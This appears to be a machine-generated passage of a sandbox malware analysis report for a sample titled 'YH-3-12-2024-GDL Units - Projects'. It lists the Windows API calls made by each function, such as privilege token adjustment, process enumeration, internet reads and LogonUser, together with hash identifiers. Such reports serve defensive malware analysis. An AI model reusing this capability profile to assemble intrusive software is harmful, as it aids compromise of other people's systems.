                                                        • Opcode Fuzzy Hash: df9bb77d297a69520a8885b2ab8b0c286a675a5f1990c21e5f24d515e74bcfd0
                                                        • Instruction Fuzzy Hash: A0A14971204205EFD300EF54C885EABB7E8FF99354F00492DF1968B1A2EB75EA49CB52
                                                        Function 007C4B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,007C4AD0), ref: 007C4B45
                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 007C4B57
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: GetNativeSystemInfo$kernel32.dll
                                                        • API String ID: 2574300362-192647395
                                                        • Opcode ID: 7869b81c767a6b718dbcc0652564268f6e3f45878eea31917dd56618cace6d6d
                                                        • Instruction ID: 7a14cd5044f1cd85566f0df30d0b58582b537cb04ad6b885a669a86216009731
                                                        • Opcode Fuzzy Hash: 7869b81c767a6b718dbcc0652564268f6e3f45878eea31917dd56618cace6d6d
                                                        • Instruction Fuzzy Hash: 92D017B8A10717DFD7209F32E828F4676E4FF063A5B11883EA596D6251E678E880CA54
                                                        Function 0083EE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 0083EE3D
                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 0083EE4B
                                                          • Part of subcall function 007C7DE1: _memmove.LIBCMT ref: 007C7E22
                                                        • Process32NextW.KERNEL32(00000000,?), ref: 0083EF0B
                                                        • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0083EF1A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                        • String ID:
                                                        • API String ID: 2576544623-0
                                                        • Opcode ID: f778580715a8f2f07c305607c91178c659e071887fa540146d5a1d8a9850a047
                                                        • Instruction ID: bbab6947b77a87d86e2aca74164de606f5b565760ad0943b61a941dd910b80f5
                                                        • Opcode Fuzzy Hash: f778580715a8f2f07c305607c91178c659e071887fa540146d5a1d8a9850a047
                                                        • Instruction Fuzzy Hash: 94516A71504715EBD310EF24D889F6BB7E8FF98710F10482DF596972A2EB74A908CB92
                                                        Function 0081E616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0081E628
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: lstrlen
                                                        • String ID: ($|
                                                        • API String ID: 1659193697-1631851259
                                                        • Opcode ID: 8a5278686ee60d7f05ac27ced6a8d85a00fef8e1afaf9d9f9d47799e01dc4ff5
                                                        • Instruction ID: 35776651ed90fb4f6d3b26939bab37c7180ef77243daaa792fb321c0e752920a
                                                        • Opcode Fuzzy Hash: 8a5278686ee60d7f05ac27ced6a8d85a00fef8e1afaf9d9f9d47799e01dc4ff5
                                                        • Instruction Fuzzy Hash: 62322475A007059FDB28CF19C4819AAB7F5FF58320B15C46EE89ADB3A1E770E981CB40
                                                        Function 008322EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0083180A,00000000), ref: 008323E1
                                                        • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00832418
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Internet$AvailableDataFileQueryRead
                                                        • String ID:
                                                        • API String ID: 599397726-0
                                                        • Opcode ID: 32f75198ca6c79ba9cb24eafa6a7ad59faf2cb772ad3222fe69275043347fee7
                                                        • Instruction ID: 9c7d5bb2cefe084122c6c88fd7bfa0193931e451293e61d636da44a3ab3b1d61
                                                        • Opcode Fuzzy Hash: 32f75198ca6c79ba9cb24eafa6a7ad59faf2cb772ad3222fe69275043347fee7
                                                        • Instruction Fuzzy Hash: 1B41F271A00209FFEB10DE95DC85EBBB7ACFB80328F10406EF605E6251EA759E4196E4
                                                        Function 0082B3FB Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 0082B40B
                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0082B465
                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0082B4B2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$DiskFreeSpace
                                                        • String ID:
                                                        • API String ID: 1682464887-0
                                                        • Opcode ID: 17160621420bd77103bf742e3e60ad3c0a4c1bf0980998fbde76d9c3110f2e75
                                                        • Instruction ID: 5e157d15a69eab5a674804b1a511f3bcd13d4cc8efe2409a13df1e935af46ab2
                                                        • Opcode Fuzzy Hash: 17160621420bd77103bf742e3e60ad3c0a4c1bf0980998fbde76d9c3110f2e75
                                                        • Instruction Fuzzy Hash: 2D214F35A00618DFCB00EF55E884EEDBBB8FF49314F1480ADE905EB251DB319955CB51
                                                        Function 008187E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 007E0DB6: std::exception::exception.LIBCMT ref: 007E0DEC
                                                          • Part of subcall function 007E0DB6: __CxxThrowException@8.LIBCMT ref: 007E0E01
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0081882B
                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00818858
                                                        • GetLastError.KERNEL32 ref: 00818865
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                        • String ID:
                                                        • API String ID: 1922334811-0
                                                        • Opcode ID: dc63f804c6d337c6d400934d82478ad038873365a2816aba9506adeafbc289ff
                                                        • Instruction ID: 9c492a7b25786af304a2f4aa74d4137b16e5530e9d65e452a64e616544c3000a
                                                        • Opcode Fuzzy Hash: dc63f804c6d337c6d400934d82478ad038873365a2816aba9506adeafbc289ff
                                                        • Instruction Fuzzy Hash: AA116DB2514205EFE718EFA5DC86D6BB7ACFF45710B20852EF45697242EB70AC808B60
                                                        Function 0081874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00818774
                                                        • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0081878B
                                                        • FreeSid.ADVAPI32(?), ref: 0081879B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                                        • String ID:
                                                        • API String ID: 3429775523-0
                                                        • Opcode ID: 8d7c4ae1cfa0b8862b2008c5d1747ea4c6e4f2adc83099e2ff01961e9d126f5e
                                                        • Instruction ID: 6d793d29d3c576a237b4ebfd28a7ddbe83e150836574b4835c813ff0f267c820
                                                        • Opcode Fuzzy Hash: 8d7c4ae1cfa0b8862b2008c5d1747ea4c6e4f2adc83099e2ff01961e9d126f5e
                                                        • Instruction Fuzzy Hash: D3F03C75911208BBDB00DFE49C89AAEB7BCFF08201F104469A601E2182D7715A448B50
                                                        Function 007CE6A0 Relevance: 3.6, Strings: 2, Instructions: 1102COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: P-$Variable must be of type 'Object'.
                                                        • API String ID: 0-1428129803
                                                        • Opcode ID: f4dadea1fb89a099597addfa399b62a018952c06946c63a74dee97cc5337aebb
                                                        • Instruction ID: 6440f780b7ea92ea0b37e546ab195e447ebccf7ba5ec16143c7ea606d2353e77
                                                        • Opcode Fuzzy Hash: f4dadea1fb89a099597addfa399b62a018952c06946c63a74dee97cc5337aebb
                                                        • Instruction Fuzzy Hash: FFA23875A00215CFCB24CF58C884FAEB7B6FB59314F24806DE905AB351D779AD82CB91
                                                        Function 0082C6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0082C6FB
                                                        • FindClose.KERNEL32(00000000), ref: 0082C72B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Find$CloseFileFirst
                                                        • String ID:
                                                        • API String ID: 2295610775-0
                                                        • Opcode ID: 6bdd7a590f13fdee1f82819d29886b5f27a74870361b4f46f87761ab8972150a
                                                        • Instruction ID: 5821a9729da997aff295e321c365683fc60433f70768ea85ddcee8c42674f8b4
                                                        • Opcode Fuzzy Hash: 6bdd7a590f13fdee1f82819d29886b5f27a74870361b4f46f87761ab8972150a
                                                        • Instruction Fuzzy Hash: 2E118E766006049FDB10DF29D849A6AF7E9FF85324F00851EF9A9C7291DB34A801CF81
                                                        Function 0082A06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00839468,?,0084FB84,?), ref: 0082A097
                                                        • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00839468,?,0084FB84,?), ref: 0082A0A9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ErrorFormatLastMessage
                                                        • String ID:
                                                        • API String ID: 3479602957-0
                                                        • Opcode ID: 56ae68f9207c7db1f523c7b6676151bb7e43a91ef14921af6dbccf30c2c43662
                                                        • Instruction ID: 540d129538222941c894faaf419eb4e73841ccd3fab22e453152cccef248c604
                                                        • Opcode Fuzzy Hash: 56ae68f9207c7db1f523c7b6676151bb7e43a91ef14921af6dbccf30c2c43662
                                                        • Instruction Fuzzy Hash: 53F0823510522DEBDB219FA4DC48FEA776CFF09361F008269FA09D6282DA709944CBA1
                                                        Function 008181CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00818309), ref: 008181E0
                                                        • CloseHandle.KERNEL32(?,?,00818309), ref: 008181F2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                        • String ID:
                                                        • API String ID: 81990902-0
                                                        • Opcode ID: 92977c41fb9c3f62d29d8b306151531cdac971f130ea719f9edce0eb588f51c5
                                                        • Instruction ID: 3629edb88ee69dcb4cb48e6acf1a8ceb6b5f9465e40950952b9e023a695e7647
                                                        • Opcode Fuzzy Hash: 92977c41fb9c3f62d29d8b306151531cdac971f130ea719f9edce0eb588f51c5
                                                        • Instruction Fuzzy Hash: 0CE0B676011610EFE7262B71EC0AD77BBEAFF04310B14882EB9A684471DB62AC91DB50
                                                        Function 007EA155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,007E8D57,?,?,?,00000001), ref: 007EA15A
                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 007EA163
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled
                                                        • String ID:
                                                        • API String ID: 3192549508-0
                                                        • Opcode ID: e821eeb5e6803f612c729a7b598462019b8781df1c6ee1146c40a3fcbf2a38de
                                                        • Instruction ID: 2b6a9da793f78a6c8e9a480c9b224d18de925163942858ce10e0cf03db798678
                                                        • Opcode Fuzzy Hash: e821eeb5e6803f612c729a7b598462019b8781df1c6ee1146c40a3fcbf2a38de
                                                        • Instruction Fuzzy Hash: 58B09235054208ABCA002F91EC09F883F68FB46AAAF404024F70D84262CB625450CA91
                                                        Function 007EF1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6b9fb1e2e287623fefe54761c44b7d9ee3160b09082b3bd27f48519d0b4af77f
                                                        • Instruction ID: fdec3c2181fc01328c49d8f5b7953806c18811f8701a8913481502eb260f0392
                                                        • Opcode Fuzzy Hash: 6b9fb1e2e287623fefe54761c44b7d9ee3160b09082b3bd27f48519d0b4af77f
                                                        • Instruction Fuzzy Hash: CC321222D2AF414DD7239635D832336A289AFBB3D5F15D737E81AB5DA6EB2CC4834101
                                                        Function 007F242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 50ab57da2f6f6e65af9b50391e0114270becc5a70ce37f8bb534dd457c7629b4
                                                        • Instruction ID: 90cf4f12d152290cf0d566da450b9e2ca791afb785338001af6af56b5f9428d6
                                                        • Opcode Fuzzy Hash: 50ab57da2f6f6e65af9b50391e0114270becc5a70ce37f8bb534dd457c7629b4
                                                        • Instruction Fuzzy Hash: 93B1F120E2AF414DD72396398871336BA5CBFBB2DAF51D71BFC2674E22EB2585834141
                                                        Function 00828889 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __time64.LIBCMT ref: 0082889B
                                                          • Part of subcall function 007E520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00828F6E,00000000,?,?,?,?,0082911F,00000000,?), ref: 007E5213
                                                          • Part of subcall function 007E520A: __aulldiv.LIBCMT ref: 007E5233
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Time$FileSystem__aulldiv__time64
                                                        • String ID:
                                                        • API String ID: 2893107130-0
                                                        • Opcode ID: 5ccdeb3ec6865b642a6b06cf147b4a1e570485297628969d6da0ed8b7fe8b3f1
                                                        • Instruction ID: 63343155a952f6d6f9b22d2a0ca00ed65df6679c5ee47655180262df5f74bd73
                                                        • Opcode Fuzzy Hash: 5ccdeb3ec6865b642a6b06cf147b4a1e570485297628969d6da0ed8b7fe8b3f1
                                                        • Instruction Fuzzy Hash: AF21D272625520CBC729CF29D841A52B3E1FFA5310F688E6CD1F5CB2C0DA34B945CB94
                                                        Function 00824C27 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00824C4A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: mouse_event
                                                        • String ID:
                                                        • API String ID: 2434400541-0
                                                        • Opcode ID: 9a2e5a144650ff2718a5e2f7c1599cf571cf4bf767a0a9f3762c45f610d0199f
                                                        • Instruction ID: 2ffd097f6c893d787fcc770de62ef2c632d675b980d5dc9dcd10d40625722230
                                                        • Opcode Fuzzy Hash: 9a2e5a144650ff2718a5e2f7c1599cf571cf4bf767a0a9f3762c45f610d0199f
                                                        • Instruction Fuzzy Hash: 5FD09EA516563D79ED1C0768BE1FF7A1548F34179AFD5B1497601CA0C2ECA09CC4A531
                                                        Function 008187B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00818389), ref: 008187D1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: LogonUser
                                                        • String ID:
                                                        • API String ID: 1244722697-0
